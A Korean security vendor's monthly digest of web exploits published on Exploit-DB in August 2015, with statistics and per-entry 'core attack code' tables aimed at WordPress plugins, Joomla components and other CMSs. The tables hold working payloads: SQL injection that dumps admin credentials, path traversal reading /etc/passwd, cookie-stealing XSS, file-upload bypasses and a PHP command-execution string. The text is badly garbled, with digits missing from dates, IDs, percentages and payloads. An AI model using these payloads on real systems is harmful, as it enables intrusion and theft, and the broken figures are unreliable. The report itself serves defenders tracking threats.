EDB 분석보고서 (05.08) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

EDB 분석보고서 (05.08) 05.08.0~05.08. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 8 월에공개된 Exploit-DB 의분석결과, 공격에대한보고개수가가장많았습니다. 분석된 공격들은주로특정웹어플리케이션의구조적인특성상발생하는들이거나구현이쉬운공격들이대부분이었습니다. 그러나 자체는공격의특성상공격이성공하게되면제 차공격이들어오게되고, 그로인해시스템의중요한정보나개인정보가노출될수있으므로그위험도는매우높은공격에해당됩니다. 로그인페이지나게시판과같은기본적인페이지에단순한쿼리로인해공격에노출되지않도록항상주의해야합니다. 주요소프트웨어별발생현황을보면 가가장많은개수의이발견되었습니다. 를사용하는관리자는사이트의 Plugin 을점검하여사이트가이발견된 Plugin 을사용하고있다면해당 Plugin 을최신버전으로업데이트하셔야합니다.. 별보고개수 보고개수 Code File Upload LFI 7 XSS 6 총합계 8 8 6 0 8 6 0 별보고개수 6 7 Code File Upload LFI XSS. 위험도별분류 위험도 보고개수 백분율 상.68% 중 76.% 합계 8 00.00% 위험도별분류 상 중. 공격난이도별현황공격난이도 보고개수 백분율 상 7.8% 중.68% 하 6 68.% 총합계 8 00.00% 공격난이도별현황 6 상 중 하. 주요소프트웨어별발생현황 소프트웨어이름 보고개수 PHPfileNavigator PhpWiki PHP News Script Nuts Wolf up.time CodoForum Aruba Mobility Controller 총합계 8 주요소프트웨어별발생현황 PHPfileNavigator PhpWiki PHP News Script Nuts Wolf up.time ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류공격난이도 공격위험도 이름 소프트웨어이름 77 상 상 Video Gallery.7 - admin-ajax.php 775 LFI 하 상 Candidate Application Form Plugin.0-775 LFI 하 상 Simple Image Manipulator Plugin.0 - download.php LFI 775 LFI 하상 Recent Backups Plugin 0.7 - download-file.php LFI 775 LFI 하 상 TF Image Gallery.0 - ajax_load.php LFI 78 하 중 Plugin 5. - forum_functions.php 78 하 중 Plugin 5. -get_album_item.php 78 하 중 Plugin 5. - get_album_item.php 706 XSS 하 중 Googmonify Plugin 0.8. - options-general.php XSS

EDB 분석보고서 (05.08) 05.08.0~05.08. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/05 775 File Upload 하중.0. File Upload Filter Bypass Remote PHP Code Execution - /microweber-latest/ File Upload POST /microweberlatest/plupload?token= &path=media%555clocalhost%555 C&path=media%55Clocalhost%55Cuploaded%55C HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows ------------7dd0008f.0. -----------------------------7dd0008f Content-Disposition: form-data; name="fil"; filename="phpinfo.php" -----------------------------7dd0008f-- 7/08/05 77 XSS 하중.0. - Stored XSS And CSRF Add Admin Exploit - /microweberlatest/api/save_option XSS POST /microweber-latest/api/save_option HTTP/..0. option_key=website_keywords&option_group=website&o ption_value="><img src=j onerror=confirm("zsl")> 7/08/05 776 중중 PHP News Script.0.0 - allgallery.php /demo/allgallery.php?id=- 00%7+union+select+user()% PHP News Script PHP News Script.0.0 /08/05 77 상상 /wp-admin/admin-ajax.php?action=googleadsense&vid=0 UNION SELECT CAST(CHAR(8,, 85, 78, 7, 7, 78,, 8, 6, 76, 6, 67, 8,, 67, 7, 78, 67, 65, 8, 0, 67, 65, 8, 8, 0, 67, 7, 65, 8, 0, 57, 55,,, 5, 56,,, 5, 57,,, 5, 56,,,, 50, 5,,,,, 5,,, 5, 56,,, 5, 57,,, 5, 5,,, 5, 56,,, 5, 5,,,, 8, 5,,,,,,,,,,,,,, 8, 5,,,, 8, 56,,,, 8,,,, 57, 55,,,, 8, 8,,,,, 5,,,, 8,,,,, Video Gallery.7 -, 8,,,,, 5,,,, 8,,,, 57, admin-ajax.php 취 5,,, 57, 57,,,,,,,,, 8, 8, 약점,,, 8,,,, 5, 5,,, 5, 57,,,,, 5,,, 5, 56,,, 7, 5,, 67, 7, 65, 8,,,, 76, 6, 78, 7, 8, 7, 0, 7, 5, 0,, 5,, 7, 5, 5,,,, 67, 65, 8, 8, 0, 67, 7, 65, 8, 0, 5, 56,,, 5, 5,,, 7, 5,, 67, 7, 65, 8,,,, 7, 5, 0,, 5,, 7, 5, 5,,, 67, 65, 8, 8, 0, 67, 7, 65, 8, 0, 5, 5,,, 5, 57,,,, 50, 5,,, 7, 5,, 67, 7, 65, 8,,,, 70, 8, 7, 77,,,, 5, 7, 5, 0,, 5,, 87, 7, 6, 8, 6,, 7, 68,, 6,, ) as CHAR) Video Gallery.7 0/08/05 775 LFI 하 상 0/08/05 7750 상 상 0/08/05 775 LFI 하 상 0/08/05 775 LFI 하 상 0/08/05 775 LFI 하 상 Candidate Application Form Plugin.0 - - article.php Simple Image Manipulator Plugin.0 - download.php LFI Recent Backups Plugin 0.7 - download-file.php LFI TF Image Gallery.0 - ajax_load.php LFI /wp-content/plugins/candidate-applicationform/downloadpdffile.php?filename=../../../../../../../../../.. /etc/passwd /wds_news/article.php?id=- +union+select+,group_concat(username,0xa,passwor d),,,5,6,7,8,,0+from+cms_admin-- /wp-content/plugins/./simple-imagemanipulator/controller/download.php?filepath=/etc/passwd /wp-content/plugins/recent-backups/downloadfile.php?file_link=/etc/passwd /wp-content/plugins/wptf-image-gallery/libmbox/ajax_load.php?url=/etc/passwd Candidate Application Form Plugin.0 Simple Image Manipulator Plugin.0 Recent Backups Plugin 0.7 TF Image Gallery.0

EDB 분석보고서 (05.08) 05.08.0~05.08. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 /08/05 7767 상상 Event Manager.. - index.php POST /joomla../index.php?option=com_jem&view=myevents &Itemid=5 HTTP/. filter=&filter_search=&limit=0&cid%5b%5d=,)%0 AND%0(SELECT%065%0FROM(SELECT%0COUN T(*),CONCAT(VERSION(),FLOOR(RAND(0)*))x%0FROM %0INFORMATION_SCHEMA.TABLES%0GROUP%0BY %0x)a)%0AND%0(577=577&filter_order=a.dates &filter_order_dir=&enableemailaddress=0&boxchecked= &task=myevents.unpublish&option=com_jem&5c57c6e0 6bd6670f7b56ecaf= Event Manager.. 5/08/05 777 중중 com_informations component - index.php /index.php?option=com_informations&view=sousthemes& themeid=.+union+select+,,version()% com_informat ions component 5/08/05 777 중 중 5/08/05 776 LFI 하 중 com_memorix component - index.php Picasaweb - plugins_player.php LFI /index.php?option=com_memorix&task=result&searchplu gin=theme&itemid=60&themeid=- 85+union+select+,,version(),,555,666,777,8 88,--+AbuHassan /plugins/gkplugins_picasaweb/plugins/plugins_player.php? f=../../../index.php com_memorix component Picasaweb 7/08/05 780 Code 중상 Nuts CMS Remote - login.php Code /login.php?r=<?php+error_reporting(0);print(_nutcmsid_);sy stem(base6_decode(\$_server[http_cmd]));die;+?> Nuts Nuts CMS 8/08/05 78 하중 Plugin 5. - forum_functions.php POST /wordpress/wp-content/plugins/wpsymposium/ajax/forum_functions.php HTTP/. Cache-Control: no-cache Plugin 5. action=gettopic&topic_id= AND SLEEP(5)&group_id=0 CMS.. - /- /-CMS/site/index.php/admin/pages/view-tree/0' 8/08/05 78 중중 CMS/site/index.php/admin/page union all select,concat(email, ":", s/view-tree/ 취약 password),,,5,6,7,8,,0 from 점 bigtree_users %/ CMS.. 8/08/05 78 하중 CMS.. - /- CMS/site/index.php/admin/ajax /pages/get-seo-score POST /-CMS/site/index.php/admin/ajax/pages/getseo-score HTTP/. CMS.. content=foo&resources=bar&id=foo' or =%&title=trees of All Sizes 8/08/05 780 하중 CodoForum.. - index.php /codoforum/index.php?u=/page/6 and =%/terms-ofservice CodoForum CodoForum.. 8/08/05 787 XSS 중중 PHPfileNavigator.. - navega.php XSS../navega.php?PHPSESSID=HELL&dir= tor or.. 8/08/05 787 XSS 중중 PHPfileNavigator.. - accion.php XSS../accion.php?accion=buscador&PHPSESSID=HELL&dir= tor or.. 8/08/05 787 XSS 중중 PHPfileNavigator.. - preferencias.php XSS../preferencias.php?PHPSESSID=HELL&dir= tor or.. 8/08/05 78 하중 8/08/05 78 하중 /08/05 7886 XSS 하중 Plugin 5. - get_album_item.php Plugin 5. - get_album_item.php up.time 7.5.0 - main.php XSS /wp-content/plugins/wpsymposium/get_album_item.php?size=version%8%% 0;%0-- /wp-content/plugins/wpsymposium/get_album_item.php?size=version%8%% 0;%0-- /main.php?section=usercontainer&subsection=edit7bef8 %5c%5ftitle%5e%5cscript%5ealert%58 %5%5c%5fscript%5ea05&id=6&name=T estingus Plugin 5. Plugin 5. up.time up.time 7.5.0

EDB 분석보고서 (05.08) 05.08.0~05.08. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 0/08/05 78 XSS 중 중 /screens/switch/switch_mon.html?mode=plogcustom&mode-title=test</td><img width= height= Mobility Aruba Aruba Aruba Mobility Controller 6...8 Mobility - switch_mon.html XSS src=/images/logo-mobility-controller.gif Controller Controller onload=alert(document.cookie)> 6...8 POST /webupgrade/webupgrade.php HTTP/. /08/05 78 하 중.0.8 - webupgrade.php.0.8 step=&login='&password='&show_advanced_output= /08/05 77 하중.0. - load_logfiles.php /remotereporter/load_logfiles.php?server=%0and%0 =&url=a.0. /08/05 76 하중.6..8 - verification.php POST /webadmin/auth/verification.php HTTP/..6..8 login= and =-- /08/05 76 하중.6..8 - index.php POST /webadmin/deny/index.php HTTP/..6..8 dpid= and =-- /08/05 706 XSS 하중 Googmonify Plugin 0.8. - options-general.php XSS POST /wp-admin/optionsgeneral.php?page=googmonify.php HTTP/. Googmonify Plugin 0.8. PID="><script>alert(document.cookie)</script>&Limit=0&A nalytics=0&aid="><script>alert(/ehsan Hosseini/)</script>&GoogmonifyUpdate=Update Options» 8/08/05 800 LFI 하상 CMS.7. - admin.php LFI POST /pluck/admin.php?action=language HTTP/. CMS.7. cont=../../../../../../../etc/passwd&save=save 8/08/05 800 File Upload 하중 CMS.7. - admin.php File Upload POST /pluck/admin.php?action=files HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows ------------7dd0008f CMS.7. -----------------------------7dd0008f Content-Disposition: form-data; name="fil"; filename="phpinfo.php5" -----------------------------7dd0008f--

EDB 분석보고서 (05.08) 05.08.0~05.08. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 8/08/05 800 XSS 하중 CMS.7. - admin.php XSS POST /pluck/admin.php?action=images HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows ------------7dd0008f CMS.7. -----------------------------7dd0008f Content-Disposition: form-data; name="imagefile"; filename="<img src=# onerror=alert(7)>.png" -----------------------------7dd0008f-- 8/08/05 800 XSS 하중 CMS.7. - admin.php XSS () POST /pluck/admin.php?action=language HTTP/. CMS.7. title=hello&seo_name=&content=<script>alert(7)</s cript>&description=&keywords=&hidden=no&sub_page=& theme=default&save=save 8/08/05 8000 File Upload 하중 POST /wolfcms/?/admin/plugin/file_manager/browse/ HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Wolf CMS - /wolfcms/?/admin/plugin/file_m ------------7dd0008f anager/browse/ File Upload Wolf Wolf CMS -----------------------------7dd0008f Content-Disposition: form-data; name="imagefile"; filename="hello.php" -----------------------------7dd0008f-- /08/05 807 XSS 하중 /08/05 807 LFI 하중 /08/05 807 XSS 하중 PhpWiki.5. - index.php XSS PhpWiki.5. - index.php LFI PhpWiki.5. - index.php XSS () /phpwiki/index.php?pagename=%c%fscript%e%c script%ealert%8document.cookie%%c%fscript %E%C!-- /phpwiki/index.php/phpwikiadministration?action=loadfile &overwrite=&source=/etc/group POST /phpwiki/index.php/userpreferences HTTP/. PhpWiki PhpWiki.5. PhpWiki PhpWiki.5. PhpWiki PhpWiki.5. pagename=userpreferencesabc<&#7;script><script>alert &#0;document&#6;cookie&#;<&#7;script><&#;& #5;&#5;